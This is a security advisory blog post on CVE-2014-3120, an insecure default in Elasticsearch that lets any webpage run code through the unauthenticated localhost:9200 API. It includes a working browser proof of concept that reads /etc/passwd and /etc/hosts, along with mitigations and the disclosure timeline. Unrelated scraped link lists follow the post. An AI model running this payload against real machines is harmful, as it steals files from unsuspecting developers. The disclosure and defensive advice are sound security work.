Insecure default in Elasticsearch enables remote code execution
Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors with Elasticsearch installed. If you’re running Elasticsearch in
development please read the instructions on how to secure your machine. Elasticsearch version
1.2 (which is unreleased as of writing) is not vulnerable to remote code execution, but still has some security concerns.
The problem(s)
There are a couple of problems which enable the proof of concept I’m going to present:
- Elasticsearch has no access roles or authentication mechanism. This means that you have full control over a cluster the moment you connect to it.
- The API for Elasticsearch is accessible over HTTP and provides no CSRF
protection whatsoever. - It contains a feature which makes it possible to evaluate expressions
as part of a query. An example usage of this feature is to specify a custom scoring function while searching through documents. It uses the MVEL language
by default. - Up to version 1.2 dynamic scripting (which
makes it possible to send scripts to the cluster on the fly) was enabled by default. As mentioned in the documentation, this feature gives someone the same priviliges as the user that runs Elasticsearch. MVEL has no sandboxing at all.
There are no issues up to this point as long as you properly follow the documentation and make sure your Elasticsearch cluster is not available from the outside world. There is one target that isn’t
mentioned in the documentation though: The Developer! When you’re developing an application that uses Elasticsearch, you probably have it running on your machine. The default port is 9200 and
because there is no CSRF protection any webpage can just connect to the cluster using localhost:9200 as the host.
PoC
The following script will read /etc/hosts and /etc/passwd from a user
visiting a webpage and display the contents in the browser.
read_file = (filename) ->
"""
import java.io.File;
import java.util.Scanner;
new Scanner(new File("#{filename}")).useDelimiter("\\\\Z").next();
"""
# This PoC assumes that there is at least one document stored in Elasticsearch, there are ways around that though
$ ->
payload = {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {}
}
for filename in ["/etc/hosts", "/etc/passwd"]
payload["script_fields"][filename] = {"script": read_file(filename)}
$.getJSON "http://localhost:9200/_search?source=#{encodeURIComponent(JSON.stringify(payload))}&callback=?", (data) ->
console.log(data)
for hit in data["hits"]["hits"]
for filename, contents of hit["fields"]
document.write("<h2>#{filename}</h2>")
for content in contents
document.write("<pre>" + content + "</pre>")
document.write("<hr>")
You can verify whether you’re vulnerable by trying out the above PoC here.
There are many ways to exploit this, you could link the victim to the page or embed it as an Iframe. You can even exploit this by crafting a URL and using it as the src of
an <img>, as the only thing that needs to happen is a single GET request. No user interaction required!
Because this is so easily exploitable you can mass-pwn developers with relatively little work.
How to secure against this vulnerability
Add the following line to your elasticsearch.yml to disable dynamic scripting and prevent remote code execution:
script.disable_dynamic: true
You should also make sure that your local Elasticsearch instance is only binding onlocalhost, as someone could exploit you over LAN
without making you visit a webpage if you don’t. The Homebrew Elasticsearch formula does this automatically. This still means you’re vulnerable to the CSRF exploit though!
If you want to be as secure as possible, you should run Elasticsearch inside a virtual machine, to make sure it has no access to the hosting machine at all.
Additional targets
Disabling scripting will prevent code execution, but that still leaves us with the issue of being able to query and administer the instance without limit. A webpage can easily dump the whole database
running on your machine, sensitive data included. This is impossible to fix by the Elasticsearch developers without adding authentication or CSRF protection.
If an attacker can figure out the internal address of your production Elasticsearch instance, you’re also open to leaking your production data. If your development machine is connected to a VPN which
provides access to your Elasticsearch cluster, an attacker can easily query or shut
down your cluster simply by making you visit a webpage.
Notes
- I have reserved CVE-2014-3120 for this issue.
- This exploit was tested against Elasticsearch version 1.1.1 on MacOSX installed through Homebrew. No configuration changes were made.
- I notified Elasticsearch through their security report instructions on the 26th of April 2014. They replied they were aware
of it, but didn’t intend to do a security release and instead disable dynamic scripting by default in version 1.2. - This security issue has been indepently discovered and blogged about on
December 9th 2013.
Insecure default in Elasticsearch enables remote code execution的更多相关文章
- MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...
- CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...
- Roundcube 1.2.2 - Remote Code Execution
本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...
- [EXP]Apache Superset < 0.23 - Remote Code Execution
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...
- [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
# Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...
- [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...
- Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现
一. Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过P ...
- [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability
漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...
- Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution
Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution Trend Mi ...
随机推荐
- hdu 4925 贪心 自己从小到大做数据找方法规律
http://acm.hdu.edu.cn/showproblem.php?pid=4925 自己逐个做数据找规律.提供下我的找的: 1 2 1 3 2 2 2 3 3 3 然后发现这种矩阵是最优的: ...
- OpenLayers学习笔记4——使用jQuery UI实现測量对话框
OpenLayers学习最好的方式就是跟着其自带的演示样例进行学习,另外对web前端的开发设计要了解,慢慢积累,这样在一般的小项目中应该是足够用了. 本篇參照量測demo实现对话框形式的量測,抛砖引玉 ...
- 服务器编程入门(4)Linux网络编程基础API
问题聚焦: 这节介绍的不仅是网络编程的几个API 更重要的是,探讨了Linux网络编程基础API与内核中TCP/IP协议族之间的关系. 这节主要介绍三个方面的内容:套接字( ...
- Java提供的enum详解
今天第一天看<<Effective Java>>,看了第六章的第一条就是全书的第30条--用enum代替int常量. 1.第一次知道原来enum也可以像class那样拥有成员函 ...
- C#-循环滚动字幕,timer,从左至右,从右至左,暂停---ShinePans
Lable的Left属性是能够更改的,可是 Right属性不能够更改,所以我们能够利用 这个特点做自加 自减运算 using System; using System.Collections.Gene ...
- Knockout应用开发指南 第六章:加载或保存JSON数据
原文:Knockout应用开发指南 第六章:加载或保存JSON数据 加载或保存JSON数据 Knockout可以实现很复杂的客户端交互,但是几乎所有的web应用程序都要和服务器端交换数据(至少为了本地 ...
- C# 简化优化if/switch 表驱动法
表示这个很强大 字典加反射,搞定多window的switch public partial class MainWindow : Window { Dictionary<string, Type ...
- spring4.1+springmvc4.1+mybatis3.2.8+spring-security3.2.5集成环境建设
在最近使用的项目ssi+spring-security 结构体.建立你自己的家,这是什么环境. 只有记录的目的. 项目结构: 类文件: ...
- Visual Studio跨平台开发实战(1) - Hello Xamarin!
原文 Visual Studio跨平台开发实战(1) - Hello Xamarin! 前言 应用程式发展的脚步, 从来没有停过. 从早期的Windows 应用程式, 到网路时代的web 应用程式, ...
- 正則表達式 取出img标签 保存于指定路径
using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.We ...